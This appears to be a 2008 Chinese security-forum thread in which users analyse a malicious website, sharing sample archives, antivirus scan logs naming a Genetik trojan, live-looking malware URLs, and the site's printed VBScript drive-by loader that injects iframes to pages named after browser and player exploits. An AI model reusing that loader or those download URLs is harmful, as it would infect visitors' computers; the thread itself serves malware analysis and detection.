毒网

显示全部楼层 · 发表于 2008-1-25 14:09:25

http://chinagoogel.3322.org

显示全部楼层 · 发表于 2008-1-25 14:15:00

Microsoft.rar (3.33 KB, 下载次数: 239)

显示全部楼层 · 发表于 2008-1-25 14:23:08

I:\virus\test\Microsoft.com - Suspect code-parts found (Level: 160)

      1 File scanned
      (0 Archives with 0 files)
      0 Signatures found
      1 Suspect code-part found
      Used time: 0:00.000

SAMPLE-12.rar (204.16 KB, 下载次数: 290)

显示全部楼层 · 发表于 2008-1-25 14:27:56

[ 本帖最后由 llgiggs 于 2008-1-25 14:29 编辑 ]

显示全部楼层 · 发表于 2008-1-25 14:34:43

opera0day... mcafee_exploit... 名字取得够牛的

<html>
<script language=VBScript>
on error resume next
set server = document.createElement("object")
server.setAttribute "classid", "clsid:10072CEC-8CC1-11D1-986E-00A0C955B42E"
set File = server.createobject(Adodb.Stream,"")
if Not Err.Number = 0 then
err.clear
document.write ("<iframe src=06014.htm width=100% height=100% scrolling=no frameborder=0>")
document.write ("<iframe src=baidu.htm width=100% height=100% scrolling=no frameborder=0>")
document.write ("<iframe src=cookie.htm width=100% height=100% scrolling=no frameborder=0>")
document.write ("<iframe src=jet.htm width=100% height=100% scrolling=no frameborder=0>")
document.write ("<iframe src=McAfee_exploit.html width=100% height=100% scrolling=no frameborder=0>")
document.write ("<iframe src=opera0day.htm width=100% height=100% scrolling=no frameborder=0>")
document.write ("<iframe src=qvod.htm width=100% height=100% scrolling=no frameborder=0>")
document.write ("<iframe src=realplay_071122_exp.html width=100% height=100% scrolling=no frameborder=0>")
document.write ("<iframe src=xunleikankan.html width=100% height=100% scrolling=no frameborder=0>")
end if
</script>
</html>

复制代码

显示全部楼层 · 发表于 2008-1-25 14:48:37

已扫描的磁盘，文件夹及文件：C:\Documents and Settings\zh\桌面\SAMPLE-12.rar
C:\Documents and Settings\zh\桌面\SAMPLE-12.rar >>RAR >>setup.exe - 可能是 Win32/Genetik 木马的一个变种
C:\Documents and Settings\zh\桌面\SAMPLE-12.rar >>RAR >>setup_unpacked.exe - 可能是 Win32/Genetik 木马的一个变种
C:\Documents and Settings\zh\桌面\SAMPLE-12.rar - 可能是 Win32/Genetik 木马的一个变种 - 已隔离 - 已删除
已扫描的文件数目：3
已发现的病毒数目：2
已清除病毒的文件数目：1
完成时间： 14:53:18 总扫描时间：2 秒 (00:00:02)

显示全部楼层 · 发表于 2008-1-25 14:48:44

Starting the file scan:

Begin scan in 'C:\Documents and Settings\Administrator\My Documents\Microsoft.rar'
C:\Documents and Settings\Administrator\My Documents\
  Microsoft.rar
[0] Archive type: RAR
   --> Microsoft.com
      [1] Archive type: Runtime Packed
      --> Object
   [WARNING] The file was ignored!
  Microsoft.rar:Zone.Identifier

End of the scan: 2008年1月24日  22:47
Used time: 00:05 min

The scan has been done completely.

   0 Scanning directories
   3 Files were scanned
   0 viruses and/or unwanted programs were found
   1 Files were classified as suspicious:
   0 files were deleted
   0 files were repaired
   0 files were moved to quarantine
   0 files were renamed
   0 Files cannot be scanned
   3 Files not concerned
   1 Archives were scanned
   1 Warnings
   0 Notes

显示全部楼层 · 发表于 2008-1-25 14:52:14

很想知道解密过程，而不是结果。

http://caob521.3322.org/down/lz.exe

[ 本帖最后由 tanlimo 于 2008-1-25 15:57 编辑 ]

显示全部楼层 · 发表于 2008-1-25 15:27:16

E:\virus\Microsoft.rar » RAR » Microsoft.com » FSG v2.0 - is OK
E:\virus\SAMPLE-12.rar » RAR » setup.exe - probably a variant of Win32/Genetik trojan - was a part of the deleted object
E:\virus\SAMPLE-12.rar » RAR » setup_unpacked.exe - probably a variant of Win32/Genetik trojan - was a part of the deleted object
E:\virus\SAMPLE-12.rar - probably a variant of Win32/Genetik trojan - deleted - quarantined

显示全部楼层 · 发表于 2008-1-25 15:28:51

2008-1-25 15:33:28 Kernel File 'E:\virus\Microsoft.rar' was sent to ESET for analysis.

[已鉴定] 毒网